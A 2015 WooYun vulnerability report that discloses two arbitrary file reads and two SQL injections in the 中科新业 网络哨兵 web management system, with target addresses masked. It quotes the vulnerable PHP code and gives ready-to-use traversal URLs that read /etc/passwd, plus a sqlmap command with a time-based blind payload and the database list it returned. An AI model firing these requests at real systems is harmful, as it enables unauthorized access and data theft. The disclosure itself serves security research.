当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126977

漏洞标题:中科新业网络哨兵两处任意文件读取+两处sql注入

相关厂商:中科新业

漏洞作者: 牛肉包子

提交时间:2015-07-17 17:23

修复时间:2015-10-15 16:26

公开时间:2015-10-15 16:26

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-17: 细节已通知厂商并且等待厂商处理中
2015-07-17: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-07-20: 细节向第三方安全合作伙伴开放
2015-09-10: 细节向核心白帽子及相关领域专家公开
2015-09-20: 细节向普通白帽子公开
2015-09-30: 细节向实习白帽子公开
2015-10-15: 细节向公众公开

简要描述:

无需登录

详细说明:

文件读取#1
看到
include/get_file.php

@set_time_limit( 60 );
if ( isset( $_GET['view'] ) && file_exists( $_GET['view'] ) )
{
				header( "Content-Type: application/octet-stream" );
				header( "Content-Disposition: attachment; filename=".basename( $_GET['view'] ) );
				readfile( $_GET['view'] );
}
else if ( isset( $_GET['view'] ) )
{
				echo $_GET['view']." 不能读取!";
}
?>


直接读取

/ucenter/include/get_file.php?view=../../../../../../../etc/passwd


QQ截图20150715165845.png


任意文件读取#2
tjbb/webmail_raw.php

function _striptext( $document )
{
				$search = array( "'<script[^>]*?>[^(document.getElementById)].*?</script>'si" );
				$replace = array( "" );
				$text = preg_replace( $search, $replace, $document );
				return $text;
}
echo "<div align=\"center\" style=\"color:#FF0000;\" > <img  border=\"0\" src=\"../images/bianmachange.gif\"/></div><hr size=\"1\" />";
$file = base64_decode( $_GET['path'] );
if ( file_exists( $file ) )
{
				echo file_get_contents( $file );
}
else
{
				echo "文件不存在";
}
?>


只需base64_encode一下

/ucenter/tjbb/webmail_raw.php?path=Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==


QQ截图20150715170155.png


sql注入
ucenter/admin/wsconfig.php

header( "Content-Type:text/html;charset=GB2312" );
session_start( );
include( "../include/globalvar.h" );
include( "../include/connectdb.php" );
include( "./authorize.php" );
include( "../include/printerror.php" );
include( "../include/addsystemlog.php" );
include( "../include/sendcmd.php" );
if ( $_GET['act'] == "Edt" )
{
				$sql = "SELECT * FROM up_status_property WHERE id=".$_GET['id']; //注入1
				$gDb->query( $sql );
				$gDb->next_record( );
				$callbackurl = $gDb->Record['callbackurl'];
				$verifyid = $gDb->Record['verifyid'];
				$valid_time = $gDb->Record['valid_time'];
				$valid_time = substr( $valid_time, 0, strpos( $valid_time, " " ) );
				$actionurl = "wsconfig.php?act=Edt&id=".$_GET['id'];
}
else if ( $_GET['act'] == "Add" )
{
				$html = "\t\t<tr>\n\t\t\t<td height=\"35\" align=\"right\" class=\"btd\">本地/远程:</td>\n\t\t\t<td class=\"btd\"><select name=\"local_or_remote\"><option value=\"0\">本地</option><option value=\"1\" selected>远程</option></select> <font color=\"#FF0000\">*</font></td>\n\t\t</tr>";
				$actionurl = "wsconfig.php?act=Add";
}
if ( $_SERVER['REQUEST_METHOD'] == "POST" )
{
				if ( $_GET['act'] == "Edt" )
				{
								$sql = "UPDATE up_status_property SET callbackurl='".$_POST['callbackurl']."', verifyid='".$_POST['verifyid']."', valid_time='".$_POST['valid_time']." 23:59:59"."' WHERE id=".$_GET['id']; //注入2
								$gDb->query( $sql );
								printerror( "WEBSERVICE配置修改成功!", "sysinfo.php?kind=webservice" );
				}
				else if ( $_GET['act'] == "Add" )
				{
								$sql = "INSERT INTO up_status_property SET callbackurl='".$_POST['callbackurl']."', verifyid='".$_POST['verifyid']."', valid_time='".$_POST['valid_time']." 23:59:59"."', flag=".$_POST['local_or_remote'];
								$gDb->query( $sql );
								printerror( "WEBSERVICE配置添加成功!", "sysinfo.php?kind=webservice" );
				}
}
echo "\n<LINK href=\"css/common.css\" type=\"text/css\" rel=\"stylesheet\">\n";
echo "<S";
echo "CRIPT LANGUAGE=\"JavaScript\" src=\"../include/common.js\"></SCRIPT>\n<form name=\"wsForm\" method=\"POST\" action=\"";
echo "\" onsubmit=\"return verifyInput();\">\n<table width=\"100%\" border=0>\n\t";
echo $html;
echo "    <tr>\n\t\t<td height=\"40\" align=\"right\" class=\"btd\">授权码: </td>\n\t\t<td class=\"btd\"><input type=\"text\" name=\"verifyid\" value=\"";
echo $verifyid;
echo "\"> <font color=\"#FF0000\">*</font></td>\n\t</tr>\n\t<tr>\n\t\t<td height=\"40\" align=\"right\" class=\"btd\">有效期: </td>\n\t\t<td class=\"btd\"><input type='text' name='valid_time' onclick=\"onselectdate(this.form.valid_time);return false;\" readonly size=\"10\" value=\"";
echo $valid_time;
echo "\" class=\"bbox\" size=\"13\"> <font color=\"#FF0000\">*</font></td>\n\t</tr>\n\t<tr>\n\t\t<td height=\"85\" align=\"right\" class=\"btd\">回调地址: </td>\n\t\t<td class=\"btd\"><textarea name=\"callbackurl\" cols=\"50\" rows=\"4\">";
echo $callbackurl;
echo "</textarea> <font color=\"#FF0000\">*</font></td>\n\t</tr>\n\t<tr>\n\t\t<td height=\"40\" class=\"btd\"></td>\n\t\t<td>\n\t\t\t<input type=\"submit\" name=\"sub\" value=\"保 存\">\n\t\t\t<input type=\"button\" name=\"ret\" value=\"返 回\" onclick=\"window.location='sysinfo.php?kind=webservice'\"> \n\t\t</td>\n\t</tr>\n</table>\n</form>\n";
echo "<s";
echo "cript language=\"javascript\">\n<!--\nfunction verifyInput()\n{\n\tif(!killspace(document.wsForm.verifyid.value))\n\t{\n\t\talert(\"授权码不能为空!\");\n\t\tdocument.wsForm.verifyid.focus();\n\t\treturn false;\n\t}\n\tif(!killspace(document.wsForm.valid_time.value))\n\t{\n\t\talert(\"有效期不能为空!\");\n\t\tdocument.wsForm.valid_time.focus();\n\t\treturn false;\n\t}\n\tif(!killspace(document.wsForm.callbackurl.value))\n\t{\n\t\talert(\"回调?;
echo "刂凡荒芪眨");\n\t\tdocument.wsForm.callbackurl.focus();\n\t\treturn false;\n\t}\n}\n//-->\n</script>\n";
?>


sqlmap.py -u "**.**.**.**/ucenter/admin/addswitchmanage.php?act=E&id=1" -p "id" --dbs


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: act=E&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))ToKi)
---
web application technology: Apache
back-end DBMS: MySQL 5.0.11
available databases [9]:
[*] `#mysql50#ucenter_08-12-26-17-21-57OURCE`
[*] cluster
[*] information_schema
[*] mysql
[*] ucenter
[*] ucenter_big_tables
[*] ucenter_gbk_bak
[*] ucenter_org
[*] ucenter_other_tables

漏洞证明:

案例

**.**.**.**/ucenter/include/get_file.php?view=../../../../../../../etc/passwd
**.**.**.**/ucenter/include/get_file.php?view=../../../../../../../etc/passwd
**.**.**.**/ucenter/include/get_file.php?view=../../../../../../../etc/passwd
**.**.**.**/ucenter/include/get_file.php?view=../../../../../../../etc/passwd
**.**.**.**/ucenter/include/get_file.php?view=../../../../../../../etc/passwd

修复方案:

QQ截图20150715170815.png

版权声明:转载请注明来源 牛肉包子@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-07-17 16:25

厂商回复:

CNVD确认所述情况,已经由CNVD通过网站公开联系方式向软件生产厂商通报。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-07-15 17:30 | 玉林嘎 ( 普通白帽子 | Rank:798 漏洞数:99 )

    哪来的源码..

  2. 2015-07-15 17:54 | 牛肉包子 ( 普通白帽子 | Rank:254 漏洞数:64 )

    @玉林嘎 小厂商 不挖了。

  3. 2015-07-15 18:02 | menmen519 ( 普通白帽子 | Rank:764 漏洞数:147 | http://menmen519.blog.sohu.com/)

    积少成多 就能上主页

  4. 2015-07-15 18:06 | 牛肉包子 ( 普通白帽子 | Rank:254 漏洞数:64 )

    @menmen519 你那几个上首页没

  5. 2015-07-15 18:07 | menmen519 ( 普通白帽子 | Rank:764 漏洞数:147 | http://menmen519.blog.sohu.com/)

    @牛肉包子 好像两个上了吧 这个没有什么意思 就没有再挖 这种简单粗暴的漏洞会把人挖傻的

  6. 2015-07-15 18:14 | 牛肉包子 ( 普通白帽子 | Rank:254 漏洞数:64 )

    @menmen519 23333 话说 我命令执行为啥根本没用 0.0